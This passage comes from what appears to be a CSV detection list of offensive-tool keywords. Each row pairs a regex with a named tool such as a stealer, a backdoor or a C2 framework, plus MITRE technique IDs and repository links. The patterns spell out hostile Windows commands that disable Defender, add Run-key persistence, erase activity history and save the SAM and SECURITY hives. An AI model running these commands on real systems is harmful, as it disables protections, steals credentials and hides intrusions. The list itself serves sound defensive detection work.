""SettingsPageVisibility"" /t REG_SZ /d ""hide:recovery;windowsdefender"" /f >nul*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\""\s\/v\s\""SettingsPageVisibility\""\s\/t\sREG_SZ\s\/d\s\""hide\:recovery\;windowsdefender\""\s\/f\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*REG ADD *igfxCUIService*",".{0,1000}REG\sADD\s.{0,1000}igfxCUIService.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ""CursorInit"" /t REG_SZ /d *",".{0,1000}REG\sADD\sHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\s\/v\s\""CursorInit\""\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ""CursorInit"" /t REG_SZ /d *",".{0,1000}REG\sADD\sHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s\/v\s\""CursorInit\""\s\/t\sREG_SZ\s\/d\s.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V*saint.jar*",".{0,1000}REG\sADD\sHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\s\/V.{0,1000}saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*Reg Add 'HKLM\Software\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}Reg\sAdd\s\'HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\'\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Classes\\Local\sSettings\\Software\\Microsoft\\Windows\\Shell\\MuiCache\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Internet Explorer\TypedPaths"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Internet\sExplorer\\TypedPaths\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Internet Explorer\TypedURLs"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Internet\sExplorer\\TypedURLs\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppBadgeUpdated"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\AppBadgeUpdated\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppLaunch"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\AppLaunch\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\ShowJumpView"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FeatureUsage\\ShowJumpView\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKCU\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps"" /f*",".{0,1000}REG\sDELETE\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Search\\RecentApps\""\s\/f.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*REG DELETE ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe""*",".{0,1000}REG\sDELETE\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\"".{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*reg delete *HKEY_LOCAL_MACHINE\SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\* SD *",".{0,1000}reg\sdelete\s.{0,1000}HKEY_LOCAL_MACHINE\\SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\sSD\s.{0,1000}","offensive_tool_keyword","reg","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","Tarrask Malware","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","risk of False positive","9","10","N/A","N/A","N/A","N/A" "*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f*",".{0,1000}reg\sdelete\sHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\s\/va\s\/f.{0,1000}","offensive_tool_keyword","reg","Delete run box history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Security /f*",".{0,1000}reg\sdelete\sHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\s\/v\sSecurity\s\/f.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*reg save hklm\sam 1337*",".{0,1000}reg\ssave\shklm\\sam\s1337.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*reg save hklm\system 1337*",".{0,1000}reg\ssave\shklm\\system\s1337.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*reg.exe query hklm\security\policy\secrets*",".{0,1000}reg\.exe\squery\shklm\\security\\policy\\secrets.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*reg.exe save HKLM\SAM sam_*",".{0,1000}reg\.exe\ssave\sHKLM\\SAM\ssam_.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*reg.exe save hklm\sam*",".{0,1000}reg\.exe\ssave\shklm\\sam.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*reg.exe save HKLM\SECURITY security_*",".{0,1000}reg\.exe\ssave\sHKLM\\SECURITY\ssecurity_.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*reg.exe save hklm\security*",".{0,1000}reg\.exe\ssave\shklm\\security.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*reg.exe save HKLM\SYSTEM sys*",".{0,1000}reg\.exe\ssave\sHKLM\\SYSTEM\ssys.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*reg.exe save hklm\system*",".{0,1000}reg\.exe\ssave\shklm\\system.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*reg.py *@* save -keyName 'HKLM\SAM*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SAM.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*reg.py *@* save -keyName 'HKLM\SECURITY*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SECURITY.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*reg.py *@* save -keyName 'HKLM\SYSTEM*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SYSTEM.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*reGeorg-master*",".{0,1000}reGeorg\-master.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*reGeorgSocksProxy.py*",".{0,1000}reGeorgSocksProxy\.py.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*register-python-argcomplete --no-defaults exegol*",".{0,1000}register\-python\-argcomplete\s\-\-no\-defaults\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*registry_hijacking_eventvwr*",".{0,1000}registry_hijacking_eventvwr.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*registry_hijacking_fodhelper*",".{0,1000}registry_hijacking_fodhelper.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*RegistryImplant*",".{0,1000}RegistryImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*registry-read.py*",".{0,1000}registry\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*RegistryTinker.exe*",".{0,1000}RegistryTinker\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*RegReeper.7z*",".{0,1000}RegReeper\.7z.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*RegReeper.cpp*",".{0,1000}RegReeper\.cpp.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - 